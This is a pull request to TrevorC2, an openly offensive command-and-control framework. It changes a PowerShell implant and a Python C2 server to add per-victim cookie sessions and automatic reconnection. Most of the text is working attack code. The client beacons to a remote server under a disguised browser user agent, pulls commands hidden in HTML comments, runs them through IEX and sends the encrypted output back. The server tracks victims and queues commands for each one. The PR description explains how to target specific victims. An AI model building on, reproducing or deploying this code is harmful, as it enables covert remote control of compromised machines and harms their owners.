### PR TITLE
Added support for sessions with cookies

### DIFF
--- a/trevorc2_client.ps1
+++ b/trevorc2_client.ps1
@@ -1,11 +1,11 @@
 #
-# TrevorC2 - legitimate looking command and control 
+# TrevorC2 - legitimate looking command and control
 # Written by: Dave Kennedy @HackingDave
 # Website: https://www.trustedsec.com
 # GIT: https://github.com/trustedsec
 # PowerShell Module by Alex Williams @offsec_ginger
 #
-# This is the client connection, and only an example. Refer to the readme 
+# This is the client connection, and only an example. Refer to the readme
 # to build your own client connection to the server C2 infrastructure.
 # CONFIG CONSTANTS:
 # Site used to communicate with (remote TrevorC2 site)
@@ -79,36 +79,44 @@ function Decrypt-String($key, $encryptedStringWithIV) {
 function random_interval {
     Get-Random -minimum $time_interval1 -maximum $time_interval2
 }
-while ($True) {
-    $time = random_interval
 
-    try {
+$cookiecontainer = New-Object System.Net.CookieContainer
+
+function connect-trevor {
+    while ($True) {
+        $time = random_interval
+
+        try {
             $HOSTNAME = "magic_hostname=$env:computername"
-			$key = Create-AesKey
+            $key = Create-AesKey
             $SEND = Encrypt-String $key $HOSTNAME
             $s = [System.Text.Encoding]::UTF8.GetBytes($SEND)
             $SEND = [System.Convert]::ToBase64String($s)
             $r = [System.Net.HTTPWebRequest]::Create($SITE_URL+$SITE_PATH_QUERY+"?"+$QUERY_STRING+$SEND)
+            $r.CookieContainer = $cookiecontainer
             $r.Method = "GET"
             $r.KeepAlive = $false
             $r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
             $r.Headers.Add("Accept-Encoding", "identity");
             $resp = $r.GetResponse()
-            break 
-    }
-    
-    catch [System.Management.Automation.MethodInvocationException] {
-        Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
-        Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
-        sleep $time
-        Continue
+            break
+        }
+        catch [System.Management.Automation.MethodInvocationException] {
+            Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
+            Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
+            sleep $time
+            Continue
         }
     }
+}
+
+connect-trevor
 
 while ($True) {
     $time = random_interval
     try {
         $r = [System.Net.HTTPWebRequest]::Create($SITE_URL + $ROOT_PATH_QUERY)
+        $r.CookieContainer = $cookiecontainer
         $r.Method = "GET"
         $r.KeepAlive = $false
         $r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
@@ -116,7 +124,7 @@ while ($True) {
         $resp = $r.GetResponse()
         $reqstream = $resp.GetResponseStream()
         $sr = New-Object System.IO.StreamReader $reqstream
-        $ENCRYPTEDSTREAM = $sr.ReadToEnd() -split("`n") | Select-String "<!-- $STUB" 
+        $ENCRYPTEDSTREAM = $sr.ReadToEnd() -split("`n") | Select-String "<!-- $STUB"
         $ENCRYPTED = $ENCRYPTEDSTREAM -split("<!-- $STUB")
         $ENCRYPTED = $ENCRYPTED[1] -split(" --></body>")
         $key = Create-AesKey
@@ -124,15 +132,21 @@ while ($True) {
         if ($DECRYPTED -eq "nothing"){
             sleep $time
         }
-        else{ 
+        else{
             if ($DECRYPTED -like $env:computername + "*"){
                 $DECRYPTED = $DECRYPTED -split($env:computername + "::::")
-                $RUN = (cmd /Q /c $DECRYPTED 2>&1 ) | Out-String
+                try {
+                    $RUN = "$DECRYPTED" | IEX -ErrorAction stop | Out-String
+                }
+                catch {
+                    $RUN = $_ | out-string
+                }
                 $RUN = ($env:computername + "::::" + $RUN)
                 $SEND = Encrypt-String $key $RUN
                 $s = [System.Text.Encoding]::UTF8.GetBytes($SEND)
                 $SEND = [System.Convert]::ToBase64String($s)
                 $r = [System.Net.HTTPWebRequest]::Create($SITE_URL+$SITE_PATH_QUERY+"?"+$QUERY_STRING+$SEND)
+                $r.CookieContainer = $cookiecontainer
                 $r.Method = "GET"
                 $r.KeepAlive = $false
                 $r.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
@@ -140,13 +154,14 @@ while ($True) {
                 $resp = $r.GetResponse()
                 sleep $time
 
-                }
             }
+        }
     }
     catch [System.Management.Automation.MethodInvocationException] {
         Write-Host "[*] Cannot connect to '$SITE_URL'" -Foreground Red
         Write-Host "[*] Trying again in $time seconds..." -Foreground Yellow
         sleep $time
+        connect-trevor
         Continue
-    }  
+    }
 }

--- a/trevorc2_server.py
+++ b/trevorc2_server.py
@@ -225,8 +225,12 @@ class RPQ(tornado.web.RequestHandler):
         log.warning('Request to C2 Request Handler from {}'.format(remote_ip))
         self.set_header('Server', 'IIS')
         site_data = open("clone_site/index.html", "r").read()
-        sid = self.get_cookie(COOKIE_SESSIONID_STRING)
-        instructions = instructionsdict[sid]
+        if self.get_cookie(COOKIE_SESSIONID_STRING):
+            sid = self.get_cookie(COOKIE_SESSIONID_STRING)
+            instructions = instructionsdict[sid]
+        else:
+            instructions = ""
+            print("[!] Somebody without a cookie accessed the website from {}".format(remote_ip))
         site_data = site_data.replace("</body>", "<!-- %s%s --></body>" % (STUB, instructions))
         self.write(str(site_data))
 
@@ -269,7 +273,7 @@ class SPQ(tornado.web.RequestHandler):
         else:
             hostname = query_output.split("::::")[0]
             data = query_output.split("::::")[1]
-            with open("clone_site/received.txt", "w") as fh:
+            with open("clone_site/received_" + sid + ".txt", "w") as fh:
                 fh.write('=-=-=-=-=-=-=-=-=-=-=\n(HOSTNAME: {}\nCLIENT: {})\n{}'.format(hostname, remote_ip, str(data)))
             set_instruction(sid,"nothing")
 
@@ -414,12 +418,12 @@ if __name__ == "__main__":
                                 print("[*] Waiting for command to be executed, be patient, results will be displayed here...")
                                 while 1:
                                     # we received a hit with our command
-                                    if os.path.isfile("clone_site/received.txt"):
-                                        data = open("clone_site/received.txt", "r").read()
+                                    if os.path.isfile("clone_site/received_" + sid + ".txt"):
+                                        data = open("clone_site/received_" + sid + ".txt", "r").read()
                                         print("[*] Received response back from client...")
                                         print(data)
                                         # remove this so we don't use it anymore
-                                        os.remove("clone_site/received.txt")
+                                        os.remove("clone_site/received_" + sid + ".txt")
                                         break
                                     time.sleep(.3)
                         else :

--- a/trevorc2_server.py
+++ b/trevorc2_server.py
@@ -25,6 +25,12 @@ SITE_PATH_QUERY = ("/images")
 # THIS IS THE QUERY STRING PARAMETER USED
 QUERY_STRING = ("guid=")
 
+# THIS IS THE NAME USED IN THE COOKIE FOR THE COMMUNICATION SESSIONID
+COOKIE_SESSIONID_STRING = ("sessionid")
+
+# THIS IS THE LENGTH OF THE COMMUNICATION SESSIONID
+COOKIE_SESSIONID_LENGTH = (15)
+
 # STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC
 STUB = ("oldcss=")
 
@@ -54,6 +60,9 @@ import urllib3
 import requests
 import threading
 import subprocess
+import collections
+import string
+import random
 try:
     import tornado.web
     import tornado.ioloop
@@ -91,9 +100,15 @@ except NameError: pass
 
 # used for registering assets
 assets = []
-def register_assets(hostname):
+def register_assets(sessionid,hostname,remoteip):
     global assets
-    assets.append(hostname)
+    asset = {'sessionid': sessionid, 'hostname': hostname, 'remoteip' : remoteip}
+    assets.append(asset)
+
+def randomString():
+    """Generate a random string of fixed length """
+    letters = string.ascii_letters
+    return ''.join(random.choice(letters) for i in range(COOKIE_SESSIONID_LENGTH))
 
 # AESCipher Library Python2/3 support - http://depado.markdownblog.com/2015-05-11-aes-cipher-with-python-3-x
 class AESCipher(object):
@@ -133,6 +148,11 @@ class AESCipher(object):
 
 # add cipher key here
 cipher = AESCipher(key=CIPHER)
+
+instructionsdict = {}
+def set_instruction(sessionid,instruction):
+    instruction_enc = cipher.encrypt(instruction.encode())
+    instructionsdict[sessionid] = instruction_enc
 
 def htc(m):
     """Decode URL for Postbacks."""
@@ -205,7 +225,8 @@ class RPQ(tornado.web.RequestHandler):
         log.warning('Request to C2 Request Handler from {}'.format(remote_ip))
         self.set_header('Server', 'IIS')
         site_data = open("clone_site/index.html", "r").read()
-        instructions = str(open("clone_site/instructions.txt", "r").read())
+        sid = self.get_cookie(COOKIE_SESSIONID_STRING)
+        instructions = instructionsdict[sid]
         site_data = site_data.replace("</body>", "<!-- %s%s --></body>" % (STUB, instructions))
         self.write(str(site_data))
 
@@ -219,6 +240,7 @@ class SPQ(tornado.web.RequestHandler):
         remote_ip = self.request.remote_ip if not x_real_ip else bleach.clean(x_real_ip)
         log.warning('Request to C2 Response Handler from {}'.format(remote_ip))
         self.set_header('Server', 'IIS')
+
         args = self.request.arguments
         if not args:
             self.write('CACHE: FILE NOT FOUND\r\n')
@@ -226,6 +248,13 @@ class SPQ(tornado.web.RequestHandler):
         for param in args:
             if param in (QUERY_STRING):
                 query = args[param][0]
+        if not self.get_cookie(COOKIE_SESSIONID_STRING):
+            sid = randomString()
+            self.set_cookie(COOKIE_SESSIONID_STRING, sid)
+        else:
+            sid = self.get_cookie(COOKIE_SESSIONID_STRING)
+        if not sid:
+            return
         if not query:
             return
         query = base64.b64decode(query)
@@ -234,18 +263,15 @@ class SPQ(tornado.web.RequestHandler):
         # register hostnames
         if "magic_hostname=" in query_output:
             hostname = query_output.split("=")[1]
-            register_assets(hostname + ":" + remote_ip)
-            print("\n*** Received connection from {} and hostname {} for TrevorC2.".format(remote_ip, hostname))
-
+            register_assets(sid,hostname,remote_ip)
+            set_instruction(sid,"nothing")
+            print("\n*** Received connection from {} and hostname {} with communication sid {} for TrevorC2.".format(remote_ip, hostname,sid))
         else:
             hostname = query_output.split("::::")[0]
             data = query_output.split("::::")[1]
             with open("clone_site/received.txt", "w") as fh:
                 fh.write('=-=-=-=-=-=-=-=-=-=-=\n(HOSTNAME: {}\nCLIENT: {})\n{}'.format(hostname, remote_ip, str(data)))
-
-            with open("clone_site/instructions.txt", "w") as fh:
-                no_instructions = cipher.encrypt("nothing".encode())
-                fh.write(no_instructions)
+            set_instruction(sid,"nothing")
 
 def main_c2():
     """Start C2 Server."""
@@ -328,11 +354,6 @@ if __name__ == "__main__":
     print('[*] Starting Trevor C2 Server...')
     threading.Thread(target=main_c2).start()
 
-    # here we say no instructions to the client
-    with open("clone_site/instructions.txt", "w") as fh:
-        no_instructions = cipher.encrypt("nothing".encode())
-        fh.write(no_instructions)
-
     print("[*] Next, enter the command you want the victim to execute.")
     print("[*] Client uses random intervals, this may take a few.")
     print("[*] Type help for usage. Example commands, list, interact.\n")
@@ -353,11 +374,10 @@ if __name__ == "__main__":
                 if assets == []:
                     print("No available TrevorC2 shells.")
                 else:
-                    print("Format: <session_id> <hostname>:<ipaddress>\n")
-                    for asset in assets:
+                    print("Format: <session_id> <hostname>:<ipaddress>:<communication_sessionid>\n")
+                    for a in assets:
                         counter = counter + 1
-                        print(str(counter) + ". " + asset + " (Trevor C2 Established)")
-
+                        print(str(counter) + ". " + a['hostname'] + " " + a['remoteip'] + " " + a['sessionid']  + " (Trevor C2 Established)")
                 print("\n")
 
             if task == "interact": print("[!] Correct usage: interact <session_id>")
@@ -374,34 +394,41 @@ if __name__ == "__main__":
 
             if "interact " in task:
                 if assets != []:
-                    hostname_select = task.split(" ")[1]
-                    hostname_select = int(hostname_select) - 1
-                    hostname = assets[hostname_select]
-                    hostname = hostname.split(":")[0]
-                    print("[*] Dropping into trevorc2 shell...")
-                    print("[*] Use exit or back to select other shells")
-                    while 1:
-                        task = input(hostname + ":trevorc2>")
-                        if task == "quit" or task == "exit" or task == "back": break
-                        task = (hostname + "::::" + task)
-                        task_out = cipher.encrypt(task.encode())
-                        with open("clone_site/instructions.txt", "w") as fh:
-                            fh.write(task_out)
-                        print("[*] Waiting for command to be executed, be patient, results will be displayed here...")
-                        while 1:
-                            # we received a hit with our command
-                            if os.path.isfile("clone_site/received.txt"):
-                                data = open("clone_site/received.txt", "r").read()
-                                print("[*] Received response back from client...")
-                                print(data)
-                                # remove this so we don't use it anymore
-                                os.remove("clone_site/received.txt")
-                                break
-                            time.sleep(.3)
-                
+                    hostname_sessionid = task.split(" ")[1]
+                    try:
+                        hostname_select = int(hostname_sessionid) - 1
+                    except ValueError:
+                        hostname_select = hostname_sessionid
+                    if isinstance(hostname_select, int):
+                        if (hostname_select < len(assets)) and (hostname_select > -1):
+                            hostname = assets[hostname_select]['hostname']
+                            sid = assets[hostname_select]['sessionid']
+                            print("\n*** interact with {} {}.".format(hostname,sid))
+                            print("[*] Dropping into trevorc2 shell...")
+                            print("[*] Use exit or back to select other shells")
+                            while 1:
+                                task = input(hostname + ":trevorc2>")
+                                if task == "quit" or task == "exit" or task == "back": break
+                                task = (hostname + "::::" + task)
+                                set_instruction(sid,task)
+                                print("[*] Waiting for command to be executed, be patient, results will be displayed here...")
+                                while 1:
+                                    # we received a hit with our command
+                                    if os.path.isfile("clone_site/received.txt"):
+                                        data = open("clone_site/received.txt", "r").read()
+                                        print("[*] Received response back from client...")
+                                        print(data)
+                                        # remove this so we don't use it anymore
+                                        os.remove("clone_site/received.txt")
+                                        break
+                                    time.sleep(.3)
+                        else :
+                             print("[!] Session id {} does not exist.".format(hostname_sessionid))
+                    else :
+                         print("[!] Session id {} is not a valid session id.".format(hostname_sessionid))
                 else:
                     print("[!] No sessions have been established to execute commands.")
-                    
+
     # cleanup when using keyboardinterrupt
     except KeyboardInterrupt:
         if os.path.isdir("clone_site/"): shutil.rmtree("clone_site/")


### PR DESCRIPTION
When i was using trevorc2, i noticed that one command would be sent to all clients. So i implemented sessions based on cookies with a sessionid (which i named the communication session id). Every client now has a cookiecontainer and the server will only send instructions to the session an attacker has interaction with. Instructions.txt had to disappear, creating sessions specific instructions.txt did not seem to work well (maybe my incompetence) so i implented a dictionary. Retrieval of the results happens in the same way as before, except that the sessionid is used in the filename.

The clients do not disconnect anymore when the server dies. Due to the use of sessions the way i implemented it, a reconnection was needed the same way the initial connection was setup. Therefore every client now has a connect-trevor, or similar, function. When the server comes back, clients will reconnect with their old communication sessionid's.

A few notes:
- The python3 implementation of the cookiecontainer has not been tested
- The c# client is altered so it could be compiled with csc.exe on my Windows 10 machine, i think with this the c# 5 implementation is realised (https://github.com/trustedsec/trevorc2/pull/10#issue-186862020)
- The ps1 client does not use cmd anymore for executing commands, but it uses native Powershell
- The interaction session handler now has error handling when a wrong sessionid is used
- For Powershell it is quite easy to kill the client (get-process -id $pid | stop-process -force), but i do not know how this could be done with the c# or python client, maybe there should be a kill/stop command implemented in every client?
- Clients do not tell their status, when interacting there is no way of knowing if communication is still possible. Shouldn't the client be telling it's own maximum random time interval on beforehand so the server knows they responded in a timely fashion?
